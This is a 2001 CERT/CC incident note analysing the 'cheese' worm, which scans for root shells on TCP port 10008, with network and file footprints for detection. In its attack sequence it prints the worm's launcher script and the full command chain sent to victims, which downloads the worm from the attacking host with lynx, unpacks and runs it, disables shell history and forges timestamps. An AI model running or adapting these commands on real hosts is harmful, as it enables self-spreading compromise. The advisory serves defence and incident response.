The CERT Coordination Center publishes incident notes to provide
information about incidents to the Internet community.
<h2>The "cheese" Worm</h2>
Date: Thursday, May 17, 2001<p>
<h3>Overview</h3>
The CERT/CC has observed in public and private reports a recent
pattern of activity surrounding probes to TCP port 10008. We have
obtained an artifact called the 'cheese worm' which may contribute to
the pattern.
<h3>Description</h3>
<p>
The 'cheese worm' is a worm designed to remove all inetd services
referencing '/bin/sh' from systems with root shells listening on TCP
port 10008. In reality, the 'cheese worm' will attempt to execute a
series of shell commands on any host which accepts TCP connections on
TCP port 10008.
<p>
The 'cheese worm' perpetuates its attack cycle across multiple hosts
by copying itself from attacking host to victim host and
self-initiating another attack cycle. Thus, no human intervention is
required to perpetuate the cycle once the worm has begun to propagate.
<p>
<b>Contents:</b>
<p>
<font face="Courier New">
<pre>
MD5 Checksum Filesize Filename
-------------------------------------------------------
c6a0feb1b1723493fe504148df4fc0af 2381 cheese
a87a2a8c31cfe38af309e173c2257158 47 go
0093fdcb12b6fb836495b7cd53d19ddb 15471 psm
</pre>
</font>
<p>
<b>Attack Sequence:</b>
<p>
In examples we have seen, the contents of the 'cheese worm' are
installed in '/tmp/.cheese' and that directory is the working
directory as commands are executed.
<p>
The attack sequence is initiated with the execution of the shell
script 'go' on the attacking host. 'go' simply executes the perl
script 'cheese':
<p>
<font face="Courier New">
<pre>
/tmp/.cheese/go:
#!/bin/sh
nohup ./cheese $1 1>/dev/null 2>&1 &
</pre>
</font>
<p>
The 'cheese' script does the following:
<p>
<ul>
<li>changes its process name to 'httpd'</li><p>
<li>deletes the 'go' script</li><p>
<li>checks for a file named 'ADL' in the working directory</li><p>
<ul>
<li>if found, 'cheese' exits</li><p>
<li>if not found, the 'ADL' file is created, the string 'ADL' is
written into the file, and the timestamp is set to match the
timestamp of the system's '/bin/ls' file</li><p>
</p></p></ul>
<li>reads '/etc/inetd.conf' and rewrites it excluding any line
that contains the string '/bin/sh'</li><p>
<li>attempts to restart inetd twice, once using '/usr/bin/killall'
and once using '/bin/killall'</li><p>
<li>until the 'cheese' process is somehow killed, it repeats a cycle
of scanning semi-random /16 (e.g., class B) network blocks for
hosts listening on TCP port 10008 using the 'psm' program.</li>
<ul><p>
<li>the first octet of the address may be from 193 to 218</li>
<li>the second octet of the address may be from 1 to 254</li>
</p></ul><p>
On hosts responding to a probe on TCP port 10008, the worm<p>
<ul>
<li>establishes a TCP connection to port 10008 of the victim host</li><p>
<li>starts a listener process on a random TCP socket number from
10000 through 15000</li>
<ul>
<li>the listener process will send a copy of
'/tmp/.cheese/cheese.uue' to anything that provides two
linefeeds after connecting to it's TCP socket</li><p>
</p></ul>
<li>sends the following commands to the victim host on TCP port
10008 (word wrapped for readability)</li><p>
<font face="Courier New">
<dl>
<dd>export TERM=vt100 ; </dd>
<dd>export PATH=\"/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin\" ; </dd>
<dd>export HISTFILE=/dev/null ; </dd>
<dd>mkdir /tmp/.cheese ; </dd>
<dd>touch -r /bin/sh /tmp/.cheese ; </dd>
<dd>cd /tmp/.cheese ; </dd>
<dd>lynx -source http://$li:$rp/ >cheese.uue ; </dd>
<dd>uudecode cheese.uue ; </dd>
<dd>tar zxvf cheese.tgz ; </dd>
<dd>rm -f cheese.tgz ; </dd>
<dd>touch -r /bin/sh * ; </dd>
<dd>chmod 755 * ; </dd>
<dd>./go $mhih ; </dd>
<dd>exit ;</dd>
</dl>
</font>
<ul><p>
<li>'$li' contains the IP address of the local system</li>
<li>'$rp' is the TCP port on the local system for the listener</li>
<li>'$mhih' is the IP address of the victim host</li>
</p></ul><p>
<dl>
If successfully executed on the victim host, these commands
cause a copy of the 'cheese worm' (e.g., cheese.uue) to be
downloaded, installed, and executed on the victim host.<p>
</p></dl>
<li>terminates the listener process</li>
</p></p></p></ul>
</p></p></p></p></p></p></p></ul>
<h3>Impact</h3>
<p>
<b>Network Footprint:</b>
<p>
A host running an active instance of the 'cheese worm' will
<p>
<ul>
<li>scan TCP port 10008 on remote /16 network blocks</li>
<li>initiate TCP connections to TCP port 10008 on victim hosts</li>
<li>receive a TCP connection on a TCP port number from 10000 through
15000 when the worm replicates to a victim host</li>
</ul>
<p>
A victim host being compromised by the 'cheese worm' will
<p>
<ul>
<li>receive a probe to TCP port 10008 from the attacking host</li>
<li>receive a TCP connection to port 10008 from the attacking host</li>
<li>initiate a TCP connection to a TCP port number from 10000 to
15000 on the attacking host</li>
<li>begin the attack cycle of an active 'cheese worm' host</li>
</ul>
<p>
<b>System Footprint:</b>
<p>
The following files may be found on a system impacted by the 'cheese
worm':
<dl>
<dd>/tmp/.cheese/</dd>
<dd>/tmp/.cheese/ADL</dd>
<dd>/tmp/.cheese/go</dd>
<dd>/tmp/.cheese/cheese</dd>
<dd>/tmp/.cheese/psm</dd>
<dd>/tmp/.cheese/cheese.uue</dd>
<dd>/tmp/.cheese/cheese.tgz</dd>
</dl>
<p>
The following files may be modified:
<p>
<dl>
<dd>/etc/inetd.conf
</dd></dl>
<p>
The following services may be restarted:
<p>
<dl>
<dd>inetd</dd>
</dl>
<p>
The 'cheese worm' relies on an exposed, unauthenticated, privileged
shell listening on TCP port 10008 to alter a system and perpetuate
its attack cycle. As such, the presence of the 'cheese worm' on a
system implies an insecure system configuration or a previous system
compromise.
<h3>Solutions</h3>
<p>
The CERT/CC encourages sites to review hosts infected with the 'cheese
worm' for other signs of intrusion and take appropriate steps to
insure the security of impacted systems.
<p>
In particular, certain versions of the BIND TSIG exploit discussed
in
<p>
<dl>
<dd><a href="/incident_notes/IN-2001-03.html">IN-2001-03</a>,
Exploitation of BIND Vulnerabilities</dd>
</dl>
<p>
create a backdoor root shell on TCP port 10008. Such an exploit was
bundled into at least one version of the '1i0n' worm. A detailed
analysis of the '1i0n' worm was published by Max Vision and is
available at
<p>
<dl>
<dd><a href="http://www.whitehats.com/library/worms/lion/index.html">
http://www.whitehats.com/library/worms/lion/index.html</a></dd>
</dl>
<p>
The <a href="http://certcc.or.kr/">Korea Computer Emergency Response
Team Coordination Center (CERTCC-KR)</a> has published
<a href="http://www.certcc.or.kr/paper/incident_note/2001/in2001_007.html">
CERTCC-KR-IN-01-007</a> discussing the 'cheese' worm in Korean.
</p>
<p>
If you believe a host under your control has been compromised, you may
wish to refer to
</p>
<p>
<dl>
<dd><a href="/tech_tips/root_compromise.html">Steps for Recovering From a Root Compromise</a></dd>
</dl>
</p>
<h3>Acknowledgement</h3>
The CERT/CC thanks <a href="http://www.certcc.or.kr/">CERTCC-KR</a> for their contributions to this Incident Note.
<p>
<b>Author</b>: <a href="mailto:cert@cert.org?subject=IN-2001-05%20Feedback">Kevin Houle</a><br/>
</p>
<!--#include virtual="/include/footer_nocopyright.html" -->
<p>Copyright 2001 Carnegie Mellon University.</p>
</p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p></p> |